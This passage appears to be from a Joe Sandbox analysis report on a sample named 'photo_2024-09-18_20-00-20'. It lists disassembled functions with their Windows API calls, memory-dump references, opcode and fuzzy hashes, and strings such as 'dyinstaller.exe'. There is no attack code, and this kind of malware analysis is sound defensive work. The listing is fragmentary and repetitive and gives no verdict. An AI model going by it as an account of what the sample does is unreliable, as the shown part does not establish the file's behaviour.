                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: CloseHandle_memset$CreateErrorLastObjectProcessSingleWait
                                                                • String ID: D
                                                                • API String ID: 1332819531-2746444292
                                                                • Opcode ID: 4642e8a1075a23a337845ea56fa765126a5af073fee0f6bb482504ba6dd05a2b
                                                                • Instruction ID: 8dce5cd8836cdef7f0196f4b1871554d43a0ae98d323bc5f6aba0356b08fec26
                                                                • Opcode Fuzzy Hash: 4642e8a1075a23a337845ea56fa765126a5af073fee0f6bb482504ba6dd05a2b
                                                                • Instruction Fuzzy Hash: 2A014BB2804129ABCF10BFE1DC09EDF7F7DEF55350F004522BA19A21A4DB349504EBA5
                                                                Function 00469F30 Relevance: 13.6, APIs: 9, Instructions: 149COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 0048A378: _malloc.LIBCMT ref: 0048A392
                                                                • InitializeCriticalSection.KERNEL32(0045C9D2,?,?,?,759113C0,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00469FFF
                                                                  • Part of subcall function 0046B870: InitializeCriticalSection.KERNEL32(0045CAEA,0045C98E,00000000,0046A00D,?,?,?,759113C0), ref: 0046B87E
                                                                  • Part of subcall function 0046B870: CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,759113C0), ref: 0046B8EB
                                                                  • Part of subcall function 0046B870: CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,759113C0), ref: 0046B8F7
                                                                  • Part of subcall function 0046B870: _memset.LIBCMT ref: 0046B909
                                                                  • Part of subcall function 0046B870: _memset.LIBCMT ref: 0046B915
                                                                • std::exception::exception.LIBCMT ref: 0046A02D
                                                                • __CxxThrowException@8.LIBCMT ref: 0046A042
                                                                • std::exception::exception.LIBCMT ref: 0046A051
                                                                • __CxxThrowException@8.LIBCMT ref: 0046A066
                                                                • std::exception::exception.LIBCMT ref: 0046A075
                                                                • __CxxThrowException@8.LIBCMT ref: 0046A08A
                                                                • std::exception::exception.LIBCMT ref: 0046A099
                                                                • __CxxThrowException@8.LIBCMT ref: 0046A0AE
                                                                  • Part of subcall function 0048A378: std::exception::exception.LIBCMT ref: 0048A3C7
                                                                  • Part of subcall function 0048A378: std::exception::exception.LIBCMT ref: 0048A3E1
                                                                  • Part of subcall function 0048A378: __CxxThrowException@8.LIBCMT ref: 0048A3F2
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: std::exception::exception$Exception@8Throw$CreateCriticalEventInitializeSection_memset$_malloc
                                                                • String ID:
                                                                • API String ID: 4113272230-0
                                                                • Opcode ID: 776008de09a3013900025a8c23f020c4384e3b0ff321d676a7073af7bb590329
                                                                • Instruction ID: 6feeb9c7903eceaabdaa0dc436bdb024539deab9ab42453f1c83e85999a74f13
                                                                • Opcode Fuzzy Hash: 776008de09a3013900025a8c23f020c4384e3b0ff321d676a7073af7bb590329
                                                                • Instruction Fuzzy Hash: C7513EB1900749AFDB00EFA5C981A9EFBF4FF09304F04452FE50597641E774A954CBA6
                                                                Function 0247A274 Relevance: 13.6, APIs: 9, Instructions: 117memorystringCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • lstrlen.KERNEL32(02472558,1001F0B0,?,00000000,00000000,?,024716AA,?,00000004,02472558,?), ref: 0247A2BB
                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,02472558,00000001,00000000,00000000,?,024716AA,?,00000004,02472558,?), ref: 0247A2D1
                                                                • GetLastError.KERNEL32(?,024716AA,?,00000004,02472558,?), ref: 0247A2E0
                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,02472558,00000001,00000000,00000000,?,?,024716AA,?,00000004,02472558), ref: 0247A36F
                                                                • _free.LIBCMT ref: 0247A382
                                                                • GetLastError.KERNEL32(?,?,024716AA,?,00000004,02472558), ref: 0247A38A
                                                                • SysAllocString.OLEAUT32(00000000), ref: 0247A3A5
                                                                • _free.LIBCMT ref: 0247A3B6
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288761111.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2470000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: ByteCharErrorLastMultiWide_free$AllocStringlstrlen
                                                                • String ID:
                                                                • API String ID: 2233872252-0
                                                                • Opcode ID: 0e6e8cc4f25669255acf556b09835198e50abb8d694982a5a8d96ba883af0bf5
                                                                • Instruction ID: bd2d90ea521173d2843ebf593abd2c26798cedd8da7f75736d0682c004ce09ac
                                                                • Opcode Fuzzy Hash: 0e6e8cc4f25669255acf556b09835198e50abb8d694982a5a8d96ba883af0bf5
                                                                • Instruction Fuzzy Hash: E841B672D00365EFE7109F658C45BDF7BB9FB48754F10412AF525E7280D7789540CAA1
                                                                Function 1000A270 Relevance: 13.6, APIs: 9, Instructions: 117memorystringCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • lstrlen.KERNEL32(10002554,1001F0B0,?,00000000,00000000,?,100016A6,?,00000004,10002554,?), ref: 1000A2B7
                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,10002554,00000001,00000000,00000000,?,100016A6,?,00000004,10002554,?), ref: 1000A2CD
                                                                • GetLastError.KERNEL32(?,100016A6,?,00000004,10002554,?), ref: 1000A2DC
                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,10002554,00000001,00000000,00000000,?,?,100016A6,?,00000004,10002554), ref: 1000A36B
                                                                • _free.LIBCMT ref: 1000A37E
                                                                • GetLastError.KERNEL32(?,?,100016A6,?,00000004,10002554), ref: 1000A386
                                                                • SysAllocString.OLEAUT32(00000000), ref: 1000A3A1
                                                                • _free.LIBCMT ref: 1000A3B2
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3289331015.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_10001000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: ByteCharErrorLastMultiWide_free$AllocStringlstrlen
                                                                • String ID:
                                                                • API String ID: 2233872252-0
                                                                • Opcode ID: d815717929827dda5e55d3f05764fc48f6d95cd046fd4e6fac32a508919c13c5
                                                                • Instruction ID: 92e8be5aa1b14d7476cacc8489220ecb3b4d7d492cf033020fc8328679f134fd
                                                                • Opcode Fuzzy Hash: d815717929827dda5e55d3f05764fc48f6d95cd046fd4e6fac32a508919c13c5
                                                                • Instruction Fuzzy Hash: 7841C172D00755ABF710DF688C45B9F7BB8FB0A7E0F114239F905A7285D734AA8086A1
                                                                Function 0046BC00 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 198COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: _wcslen$_strlen
                                                                • String ID: @Mc
                                                                • API String ID: 2148666584-515331448
                                                                • Opcode ID: 2553e6cd990f75919d2ea84b5f76d6f463a8825c4bf9de088217c12881966326
                                                                • Instruction ID: caed66d9ba1d076d0a972107bb9922411114bf5cc64a3138559ee1d9737dc981
                                                                • Opcode Fuzzy Hash: 2553e6cd990f75919d2ea84b5f76d6f463a8825c4bf9de088217c12881966326
                                                                • Instruction Fuzzy Hash: BA712CB1D002189BDF14EFAACC81ADEB7B5BF44304F54446EE409E7211E7396A85CF9A
                                                                Function 00446F50 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 183COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: Xinvalid_argumentstd::_$_wcslen
                                                                • String ID: (@$list<T> too long
                                                                • API String ID: 4292115853-2356419498
                                                                • Opcode ID: b0caac17866e536fa48a1223e9653112ab2b2d208b98e40f79de9e676d5713b8
                                                                • Instruction ID: d671550d454ed3fccbda6131889b3744988b7888a23341e87fa3f46ec01c4929
                                                                • Opcode Fuzzy Hash: b0caac17866e536fa48a1223e9653112ab2b2d208b98e40f79de9e676d5713b8
                                                                • Instruction Fuzzy Hash: 0B613971A00204DFDB04DF28C984AAEBBB6FF46718F14C52EE519A7381C738AD06CB59
                                                                Function 00455950 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 156COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • std::_Xinvalid_argument.LIBCPMT ref: 00455A26
                                                                • std::_Xinvalid_argument.LIBCPMT ref: 00455A61
                                                                • _wcslen.LIBCMT ref: 00455A83
                                                                • __CxxThrowException@8.LIBCMT ref: 00455B2F
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: Xinvalid_argumentstd::_$Exception@8Throw_wcslen
                                                                • String ID: ProtoValue operator[int] out of range$core\ProtoValue.cpp$invalid vector<T> subscript
                                                                • API String ID: 352141960-604142088
                                                                • Opcode ID: b161b78ccd2bc83481675462d6127ca27e24c89861edec4d05c9073d921c2dd6
                                                                • Instruction ID: 43408365c646dce6a0f5e9290ced37e7eb693d8856d31957cbfc7978873897a6
                                                                • Opcode Fuzzy Hash: b161b78ccd2bc83481675462d6127ca27e24c89861edec4d05c9073d921c2dd6
                                                                • Instruction Fuzzy Hash: 7751A171E002089FDB14DFA9C98169EB7B2FF44304F24866FE816A7382DB746E04CB55
                                                                Function 0044C8F0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 146COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: _wcslen$BrowseFolderFreeFromListPathTask_memmove
                                                                • String ID: Q
                                                                • API String ID: 1059456727-3463352047
                                                                • Opcode ID: bd316b7a37158301d24960e430932c1149cefdc137de32b0eff9a6792f07c81a
                                                                • Instruction ID: 550a6c916dcaee83bee3fa104328b23c20bb4827a1d60581aa9b522482c60bcb
                                                                • Opcode Fuzzy Hash: bd316b7a37158301d24960e430932c1149cefdc137de32b0eff9a6792f07c81a
                                                                • Instruction Fuzzy Hash: F75119B1D016299BDB64EF58DD89799B7B0FF48304F0006EAD40DA3250E7786A94CF89
                                                                Function 00483AD0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 144COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: Xinvalid_argumentstd::_$_memmove
                                                                • String ID: invalid string position$string too long
                                                                • API String ID: 2168136238-4289949731
                                                                • Opcode ID: 07ac86688fc159b4fc913c53219920ef684af43a570a64df05d93eece39a4cda
                                                                • Instruction ID: 6a0d0f11a1e57d777c81c13cbbfc57446fa5b8f036b8a9faf1932f16239e98f2
                                                                • Opcode Fuzzy Hash: 07ac86688fc159b4fc913c53219920ef684af43a570a64df05d93eece39a4cda
                                                                • Instruction Fuzzy Hash: 8941D5723006448BDB24FE1DD981D6EF7EAEBD1B227200D2FE552C7682C778AD408799
                                                                Function 00408135 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 143timeCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 00402D76: __EH_prolog3.LIBCMT ref: 00402D7D
                                                                  • Part of subcall function 00402D3B: __EH_prolog3.LIBCMT ref: 00402D42
                                                                • CloseHandle.KERNEL32(00000000), ref: 004082D1
                                                                • SetTimer.USER32(?,00000010,00000064,00000000), ref: 004082DF
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: H_prolog3$CloseHandleTimer
                                                                • String ID: %s\%s$CalcMd5$MainDlg.cpp$dyinstaller.exe$file:%s, size:%I64d
                                                                • API String ID: 2299866660-1546516990
                                                                • Opcode ID: 6be2baf56298b2e0120a07179e1543da866e239b00f204fa94f2da04d5cc8685
                                                                • Instruction ID: 4899682e45c31d921a75a5ea58556993d665191ec4f47b9a43d71d28c29e38f7
                                                                • Opcode Fuzzy Hash: 6be2baf56298b2e0120a07179e1543da866e239b00f204fa94f2da04d5cc8685
                                                                • Instruction Fuzzy Hash: A051C370604705AFD7109F64CC89F167BFAFF89318F00092EF5599B2A1DB79A811CBA6
                                                                Function 0045EB80 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 0045E7E0: std::exception::exception.LIBCMT ref: 0045E8BA
                                                                  • Part of subcall function 0045E7E0: __CxxThrowException@8.LIBCMT ref: 0045E8D5
                                                                  • Part of subcall function 0045E7E0: std::exception::exception.LIBCMT ref: 0045E8F3
                                                                  • Part of subcall function 0045E7E0: __CxxThrowException@8.LIBCMT ref: 0045E90E
                                                                • std::exception::exception.LIBCMT ref: 0045EC9A
                                                                • __CxxThrowException@8.LIBCMT ref: 0045ECB5
                                                                • std::exception::exception.LIBCMT ref: 0045ECD3
                                                                • __CxxThrowException@8.LIBCMT ref: 0045ECEE
                                                                • std::exception::exception.LIBCMT ref: 0045ED08
                                                                • __CxxThrowException@8.LIBCMT ref: 0045ED23
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: Exception@8Throwstd::exception::exception
                                                                • String ID: _
                                                                • API String ID: 3728558374-2179862614
                                                                • Opcode ID: 8997e908e9d472479eac262005f5dc8c019d2c544da77755ab0f0ed15d435e60
                                                                • Instruction ID: f1af594e63baced3a0034acf9ebbf5cc42faab5e489acec31d3ea6c02574f6b4
                                                                • Opcode Fuzzy Hash: 8997e908e9d472479eac262005f5dc8c019d2c544da77755ab0f0ed15d435e60
                                                                • Instruction Fuzzy Hash: FD51B471900208DFCB08EF96C481ADDBBF1FF49319F14815EE915AB352C775AA49CB94
                                                                Function 00412581 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 131COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetWindowRect.USER32(?,00000000), ref: 004125B2
                                                                • GetWindow.USER32(?,00000004), ref: 004125C6
                                                                • MonitorFromWindow.USER32(?,00000002), ref: 004125ED
                                                                • GetMonitorInfoW.USER32(00000000), ref: 004125F4
                                                                • GetWindowRect.USER32(00000000,00000000), ref: 0041261D
                                                                • SetWindowPos.USER32(?,00000000,?,?,000000FF,000000FF,00000015), ref: 00412697
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: Window$MonitorRect$FromInfo
                                                                • String ID: (
                                                                • API String ID: 1841735005-3887548279
                                                                • Opcode ID: 9fde1c6961d589f4eaa60350706da8a3fed715373ae273ce77f73b14ffc96684
                                                                • Instruction ID: 74ce305ac20aac0c23993f9e1583b3999635ac364bf74775587cfd047f60b698
                                                                • Opcode Fuzzy Hash: 9fde1c6961d589f4eaa60350706da8a3fed715373ae273ce77f73b14ffc96684
                                                                • Instruction Fuzzy Hash: C4415C32A006199FCF00CFA8CE85AEEB7F6FB49314F154515E501FB294D7B4AE098B55
                                                                Function 004096A9 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 130COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
